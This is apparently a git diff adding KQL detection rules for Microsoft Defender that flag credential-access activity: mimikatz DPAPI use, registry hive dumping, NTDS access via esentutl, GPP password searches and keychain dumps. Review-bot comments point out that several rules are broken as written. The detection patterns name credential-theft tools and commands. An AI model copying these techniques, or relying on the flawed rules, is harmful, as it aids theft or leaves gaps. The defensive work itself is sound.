+| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
new file mode 100644
index 00000000..dd609165
--- /dev/null
+++ b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
@@ -0,0 +1,12 @@
+// Title: Access To Windows Credential History File By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
+This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
+| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
new file mode 100644
index 00000000..60770bc3
--- /dev/null
+++ b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
@@ -0,0 +1,12 @@
+// Title: Access To Windows DPAPI Master Keys By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
+This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
+| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql
new file mode 100644
index 00000000..2f90a1f7
--- /dev/null
+++ b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Browser Started with Remote Debugging
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1185
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql
new file mode 100644
index 00000000..5dc13da8
--- /dev/null
+++ b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql
@@ -0,0 +1,12 @@
+// Title: Capture Credentials with Rpcping.exe
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s" or ProcessCommandLine contains "–s" or ProcessCommandLine contains "—s" or ProcessCommandLine contains "―s") and (FolderPath endswith "\\RpcPing.exe" or ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe")) and ((ProcessCommandLine contains "ncacn_np" and (ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t" or ProcessCommandLine contains "–t" or ProcessCommandLine contains "—t" or ProcessCommandLine contains "―t")) or (ProcessCommandLine contains "NTLM" and (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql
new file mode 100644
index 00000000..155368db
--- /dev/null
+++ b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql
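Review bot: `ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe"` can never be true, because the OriginalFileName version-info field holds a bare file name and never a path; the leading backslash should be dropped, `ProcessVersionInfoOriginalFileName =~ "RpcPing.exe"`, matching the correct form `=~ "Cmd.Exe"` used in the Copy .DMP/.DUMP rule of this same commit. The Copying Sensitive Files with Credential Data rule carries the same artifact (`=~ "\\esentutl.exe"`), which suggests the converter is prefixing OriginalFileName values as though they were Image paths, so the fix should land there rather than in the individual files. The fallback on `FolderPath endswith "\\RpcPing.exe"` keeps the rule partially functional in the meantime.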
@@ -0,0 +1,12 @@
+// Title: Certificate Exported Via PowerShell
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001
+// False Positives:
+// - Legitimate certificate exports by administrators. Additional filters might be required.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
new file mode 100644
index 00000000..8121a3b7
--- /dev/null
+++ b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains " \\\\")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql
new file mode 100644
index 00000000..0a42abf5
--- /dev/null
+++ b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql
@@ -0,0 +1,10 @@
+// Title: Copy Passwd Or Shadow From TMP Path
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-31
+// Level: high
+// Description: Detects when the file "passwd" or "shadow" is copied from tmp path
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "passwd" or ProcessCommandLine contains "shadow") and FolderPath endswith "/cp" and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql b/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql
new file mode 100644
index 00000000..b8d224e8
--- /dev/null
+++ b/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql
@@ -0,0 +1,12 @@
+// Title: Copying Sensitive Files with Credential Data
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Files with well-known filenames (sensitive files with credential data) copying
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
+// False Positives:
+// - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " -m " or ProcessCommandLine contains " /m " or ProcessCommandLine contains " –m " or ProcessCommandLine contains " —m " or ProcessCommandLine contains " ―m " or ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\security" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\windows\\ntds\\ntds.dit")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql
new file mode 100644
index 00000000..15a616e2
--- /dev/null
+++ b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql
@@ -0,0 +1,12 @@
+// Title: Cred Dump Tools Dropped Files
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-11-01
+// Level: high
+// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
+// False Positives:
+// - Legitimate Administrator using tool for password recovery
+
+DeviceFileEvents
+| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
new file mode 100644
index 00000000..f1da9f32
--- /dev/null
+++ b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
@@ -0,0 +1,14 @@
+// Title: Credential Manager Access By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-11
+// Level: medium
+// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
+Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
+
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+// - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).
+
+DeviceFileEvents
+| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql
new file mode 100644
index 00000000..cce1fca6
--- /dev/null
+++ b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql
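Review bot: The `| where` line tests `FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\"` (and three siblings), but FileName in DeviceFileEvents holds only the file's name, not its directory, so none of these `contains` terms can match and the rule never fires; the path tests belong on FolderPath, e.g. `FolderPath contains "\\AppData\\Local\\Microsoft\\Credentials\\"`. Separately, the second Description line `Which can be a sign of credential stealing. …` is emitted without the `//` prefix, so it is bare text in the query rather than a comment and will fail to parse when the file is run; the same unprefixed continuation lines appear in the Enumeration for Credentials in Registry, File Access Of Signal Desktop and LaZagne rules. The generator should prefix every line of a multi-line description with `// `. Whether DeviceFileEvents surfaces read access to these files at all, rather than only create/modify/delete actions, is worth confirming before treating this rule as coverage.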
@@ -0,0 +1,12 @@
+// Title: Credentials from Password Stores - Keychain
+// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects passwords dumps from Keychain
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "find-certificate" or ProcessCommandLine contains " export ") and FolderPath =~ "/usr/bin/security") or (ProcessCommandLine contains " dump-keychain " or ProcessCommandLine contains " login-keychain ")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/credentials_in_files.kql b/KQL/rules/Credential Access/credentials_in_files.kql
new file mode 100644
index 00000000..1ac52bd4
--- /dev/null
+++ b/KQL/rules/Credential Access/credentials_in_files.kql
@@ -0,0 +1,10 @@
+// Title: Credentials In Files
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: high
+// Description: Detecting attempts to extract passwords with grep and laZagne
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "password" and FolderPath endswith "/grep") or ProcessCommandLine contains "laZagne"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql
new file mode 100644
index 00000000..657873d6
--- /dev/null
+++ b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: CredUI.DLL Loaded By Uncommon Process
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-20
+// Level: medium
+// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1056.002
+// False Positives:
+// - Other legitimate processes loading those DLLs in your environment.
+
+DeviceImageLoadEvents
+| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
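Review bot: The OR-branch `InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll")` describes the loading process, not the loaded image, so it is only true for a process whose own PE metadata claims to be credui.dll, which in practice means never; the upstream OriginalFileName selector refers to the image being loaded, and DeviceImageLoadEvents appears to expose no OriginalFileName column for that image, so this branch adds nothing and the FolderPath checks carry the rule alone. I would drop the branch, or leave a comment `// OriginalFileName of the loaded image is not available in DeviceImageLoadEvents; matched on FolderPath only` so the next reader does not assume the metadata check is effective.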
diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
new file mode 100644
index 00000000..b6f4121e
--- /dev/null
+++ b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
@@ -0,0 +1,13 @@
+// Title: DPAPI Backup Keys And Certificate Export Activity IOC
+// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-26
+// Level: high
+// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, attack.t1552.004
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "ntds_capi_" or FolderPath contains "ntds_legacy_" or FolderPath contains "ntds_unknown_") and (FolderPath endswith ".cer" or FolderPath endswith ".key" or FolderPath endswith ".pfx" or FolderPath endswith ".pvk")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql
new file mode 100644
index 00000000..30d6ab69
--- /dev/null
+++ b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Dumping of Sensitive Hives Via Reg.EXE
+// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
+// Date: 2019-10-22
+// Level: high
+// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
+// False Positives:
+// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql
new file mode 100644
index 00000000..0f646b54
--- /dev/null
+++ b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql
@@ -0,0 +1,12 @@
+// Title: Dumping Process via Sqldumper.exe
+// Author: Kirill Kiryanov, oscd.community
+// Date: 2020-10-08
+// Level: medium
+// Description: Detects process dump via legitimate sqldumper.exe binary
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate MSSQL Server actions
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql
new file mode 100644
index 00000000..ee03e1f5
--- /dev/null
+++ b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql
@@ -0,0 +1,10 @@
+// Title: Enumeration for 3rd Party Creds From CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (not(((ProcessCommandLine contains "export" or ProcessCommandLine contains "save") and FolderPath endswith "reg.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
new file mode 100644
index 00000000..8a7da21a
--- /dev/null
+++ b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
@@ -0,0 +1,13 @@
+// Title: Enumeration for Credentials in Registry
+// Author: frack113
+// Date: 2021-12-20
+// Level: medium
+// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
+The Windows Registry stores configuration information that can be used by the system or other programs.
+Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/esentutl_gather_credentials.kql b/KQL/rules/Credential Access/esentutl_gather_credentials.kql
new file mode 100644
index 00000000..2acd3ec5
--- /dev/null
+++ b/KQL/rules/Credential Access/esentutl_gather_credentials.kql
@@ -0,0 +1,12 @@
+// Title: Esentutl Gather Credentials
+// Author: sam0x90
+// Date: 2021-08-06
+// Level: medium
+// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404
+// False Positives:
+// - To be determined
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql
new file mode 100644
index 00000000..42aee421
--- /dev/null
+++ b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql
@@ -0,0 +1,10 @@
+// Title: Esentutl Volume Shadow Copy Service Keys
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-20
+// Level: high
+// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceRegistryEvents
+| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
new file mode 100644
index 00000000..392832e1
--- /dev/null
+++ b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
@@ -0,0 +1,16 @@
+// Title: File Access Of Signal Desktop Sensitive Data
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-10-19
+// Level: medium
+// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
+The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
+Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
+Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Unlikely, but possible from AV or backup software accessing the files.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\AppData\\Roaming\\Signal*" and (RegistryKey endswith "\\config.json" or RegistryKey endswith "\\db.sqlite")) and (not((InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/findstr_gpp_passwords.kql b/KQL/rules/Credential Access/findstr_gpp_passwords.kql
new file mode 100644
index 00000000..2f0fe3c9
--- /dev/null
+++ b/KQL/rules/Credential Access/findstr_gpp_passwords.kql
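Review bot: The query in this hunk runs against DeviceRegistryEvents and tests RegistryKey, yet the rule (and its own Description) is about access to files under `\AppData\Roaming\Signal`, so the table and field are the wrong ones and the rule can never match; the path belongs on FolderPath in DeviceFileEvents. Also `RegistryKey endswith "\\AppData\\Roaming\\Signal*"` keeps a literal `*` from the source pattern, and one value cannot end with both that and `\\config.json`, so the conjunction is unsatisfiable even on the right table. I would rewrite the body as `DeviceFileEvents | where FolderPath contains "\\AppData\\Roaming\\Signal" and (FolderPath endswith "\\config.json" or FolderPath endswith "\\db.sqlite") and not(InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe")`. Whether DeviceFileEvents records the read access the rule intends, rather than only create/modify actions, should be confirmed before relying on it, and the three unprefixed Description continuation lines need a `// ` prefix to keep the file parseable.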
@@ -0,0 +1,10 @@
+// Title: Findstr GPP Passwords
+// Author: frack113
+// Date: 2021-12-27
+// Level: high
+// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
